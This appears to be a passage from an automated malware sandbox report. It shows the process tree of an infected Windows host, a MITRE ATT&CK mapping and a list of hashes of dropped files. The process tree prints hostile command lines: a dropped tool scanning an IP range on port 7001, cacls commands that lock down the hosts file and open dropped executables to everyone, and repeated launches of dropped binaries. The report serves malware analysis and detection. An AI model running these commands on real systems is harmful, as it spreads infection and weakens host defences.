C:\Windows\TEMP\mfckutrue\ligfuakbd.exeC:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 4760 C:\Windows\TEMP\mfckutrue\4760.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:220 -
C:\Windows\TEMP\mfckutrue\ligfuakbd.exeC:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 3548 C:\Windows\TEMP\mfckutrue\3548.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1144 -
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\mfckutrue\tbejirgpe\scan.bat2⤵PID:3672
-
C:\Windows\mfckutrue\tbejirgpe\iljtkedpu.exeiljtkedpu.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2368 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:4384
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3248
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:1140
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1752
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:3604
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3924
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:1600
-
C:\Windows\SysWOW64\ogiqci.exeC:\Windows\SysWOW64\ogiqci.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1624
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\kbejuig.exe1⤵PID:4356
-
C:\Windows\ime\kbejuig.exeC:\Windows\ime\kbejuig.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4420
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ycubiyfde\kayllc.exe /p everyone:F1⤵PID:2580
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:1352
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\ycubiyfde\kayllc.exe /p everyone:F2⤵PID:800
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\mitbajei\kbejuig.exe /p everyone:F1⤵PID:2448
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:208
-
C:\Windows\system32\cacls.execacls C:\Windows\mitbajei\kbejuig.exe /p everyone:F2⤵PID:4188
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\kbejuig.exe1⤵PID:208
-
C:\Windows\ime\kbejuig.exeC:\Windows\ime\kbejuig.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5328
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ycubiyfde\kayllc.exe /p everyone:F1⤵PID:5332
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5160
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\ycubiyfde\kayllc.exe /p everyone:F2⤵PID:2556
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\mitbajei\kbejuig.exe /p everyone:F1⤵PID:5404
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5696
-
C:\Windows\system32\cacls.execacls C:\Windows\mitbajei\kbejuig.exe /p everyone:F2⤵PID:5704
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
33.4MB
MD5c2a4f1db1177f38daadaa9752e404a1a
SHA11a5bacb089c21c5fb4786c8d424dd3d497c064e0
SHA2560c5a796e2b7895342de9bb445d53d24568ebe5210ad4d86351f0eb7d53e022b1
SHA5128138b93720f681cfb3eb2cc5535de31f5eaff041654a1377ee64e89ba7d6bc848c5c607aa6f222af5dd83a3e5adb87da22a9e50c49d7974fce44e5d1a0b77b39
-
Filesize
26.3MB
MD5297970b4686972ef66120c56be3df199
SHA16359970b4886325766e86d29e8403831362a2a50
SHA25613f33f2330537cec1ecac944c8037df124920eeabbb70f2a44a1c6dffc9fd89b
SHA51238a5f2b91032aef235040d83fc7e4f1d50e58e3201bd22bf62c5c4c7a314589365ff6875aba97cc5e6ca8d1c192b23c2ac62bb2b6b59bea0525dc930bc910b04
-
Filesize
4.2MB
MD5ad188d78e445375cb18d5017379ff104
SHA150338378e55382f1dc6ab5c66f62cb1e735881c6
SHA256593a1a10e8f2169d3ea13e5559f4cd6d3467aa02d9157047b49eb2d59b7e0bd6
SHA512d5354de73c1a78d7be40c1a26942a30bf12c8106b6170be5dc0d4152a95ddeda1eab92d8a2c57061c095cab55fa7212c7f466fda8961978e2400bd81e4d0f399
-
Filesize
3.9MB
MD542b588ad6686c4cb74caf45fbfca6562
SHA1abbbad5268dc86f19db7a95bae685cb75b317ffc
SHA25617943ae78b50b82f89c9837783949f97033fa9685d6d1d05561df80682f90039
SHA512f2f2de9ec483c36c788307acf64086dc673cab4e6475e0057c1119ddb9ca2c16ea41c40e7628037004649a0558441d3946c932144742763ed42afda72518e15e
-
Filesize
2.9MB
MD58ac866850dc5abca95f5460d860b9072
SHA1a2d4538cf7c608c42a94f16ccb4e8093780be341
SHA256ce9bf67118e22f24622285276b9063dbefcd9b6ee6ab9d61b7bcf361c751377b
SHA512c9cb98700264b9cd7d11101325cc956be49e3fa6b79de992a44e5f9aa0b937830350bcdfdbeebaef93feeb20c08e215c915c0875bfeb9b7316f5b75605010845
-
Filesize
7.5MB
MD5f76a319f0d77e0df4d0264ebd1bda2cb
SHA1e533bb6675d74a18617898ce678967f12e663a12
SHA256375eceecee9315c7e5365af004c4055f3dd1f6648befcff1d80333a8c4a1467c
SHA512c9696c9c9b385a25c3fce3a6eb3cbcc7a1747272a6e8dbf1079e4cc92cbcd69596b90a0db172319a3b6d306eb11b1b019412632c5bbf5da8399d13ace4c0990a
-
Filesize
814KB
MD5db3af7fa8940998f3a48314fbe8f2614
SHA1aa187a9d113356e001e4ed8b8c4eb407f8e1309d
SHA25667259ed417e7023a1cd70ec18d693df0c3c9e1d0bcc32c2dd0b1e9eb1b03f223
SHA512e0a36c650cdc7a2a7f961b687da8e2d38fd32435f31ea4050d6d869f59a49d1d7b0f491a5d53d5f8774bcf269ba78840c5ac9395d5c70c82dd2d4b00e828cb2f
-
Filesize
2.4MB
MD5488ed803504f1f35b2ee4b7240526606
SHA1a682b4e9ab09e5ab8e7d6c336458d50439abaae5
SHA256d1192f7f44b98c1a0dd5dfee5d03e7623e5e77dd5f603903afb614496dcbba2a
SHA5120f75ddf47143d5a567d7e467a70519a0dae92705a6dd94181765caac6c7518150076ef541daad8c7445f5989aefb093efac3b12d56fbd140c6368f091c962bdf
-
Filesize
20.4MB
MD5f0923bbb6be0da97d8bd4b3564cb830d
SHA1eb491cfd7a3171e052c39ca596f5cf264ba834f4
SHA256fbce8b196d88306f2ec746b9e8241a9bf7eca2dfe44ab8879b5b3517a94f2550
SHA512e695070076a8cc47b97a687228b980b65044532d40d9f338974e364137ae1bdfb77ca127707b820d49dc2db218614fbe9cbf0f490f0f101232673aefc7c0b028
-
Filesize
4.2MB
MD58ece81d36d252cfee01c68706238e674
SHA1ffe870e55d26c2b8fba49bd445dbc4bb2aada495
SHA25628fd69e0db586a96d6a3295a59fdea4f5ac6431ffb7af90b8b261abbede3242b
SHA5128a660de4c96f88d82f91bdf77d40cf59d6baf87ffcaf3249fe408c7233dc18761994b70ec48bcc43cde03fbe5ac94db462d9050f23f1bbcd3261f27002581182
-
Filesize
44.0MB
MD5fc3d6c340084f5aaeb7a44cb47440c6d
SHA1524d5b1c581607b5235a9c416edf81a1a23a6039
SHA2567c2dafccce179416ca769aa4b2fcf5417b5f840346b1a43254d3f1954a26f67e
SHA5127bdba8b207bf30a0743cf3c609073af9a96df346060fa2d4903b0f25cc5834cecd245b4ef0181d7c86d2b013255dca4976b0b1f240ed78d3b7419fdc03541ddb
-
Filesize
8.6MB
MD59f0307f29acbaf2f4fb8e8a86b43d304
SHA1e9d71f51c1560ee425565f3b3b8d2fc41e769b66
SHA2563fccff30b4b8c8cce143bd23a11c5f85232b4e32b7b0a3d4c2ce13383a736350
SHA512a6842a3a94f3189cc44081074ab2433a5173fe87b512259b4521086af4a76b4566065e1882a874407ebb1198cfa767a9017179a71d950d544a4a7ef529daf1da
-
Filesize
1.2MB
MD55644c62a6a1c91d2bd58f14075f3288f
SHA1b3785bc39ba480da08f9b9ba3fc342f3094fefe5
SHA256c9db09af8d60a9c97ddef54d3ae66190ff11835c1cb2f1b7dd108ba61cb5f317
SHA512894cc96bcff47f179d95d931f682d03c8735aad354f8af28f8000b03f409a5c179c970ff965d06c52b004ce1caeef64e8db51b4439604c7158080b7c3a204b44
-
Filesize
1.9MB
MD52fdc0b38fa8ba34a7162d9d5bb7fc5c3
SHA1648e3770e7fbe84948da186d3f529e3d2c8b7f65
SHA256573900663ef3c20d9dfa14e430417e17a97f45bb949be82c98868f290872305b
SHA5121d4d6caf83ed15fd14bbed4bb656124fdb272b8f614482b08da004575bd01bef6872642875a0507f8af84fe0d3f7875502a17dfcad4a8e4b4c1377eaa1372f5b
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
17.3MB
MD5da683de68667dd4253fa1d7062a50c32
SHA12b926b6103f563f46afa3b9f2dad08b6d966b7bc
SHA25608b8abf676a8c69b70e3befb0c298b50107b3189e8c8d5469da068dc5bb1aefe
SHA5121c5506535bca4bc06ace392b2b7c59aefb4043b887931c0d21f8e24c131989a4fcabbf904da1168a17d7005f1ca67b6545401a1d3eabf97102d652030a0f2977
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376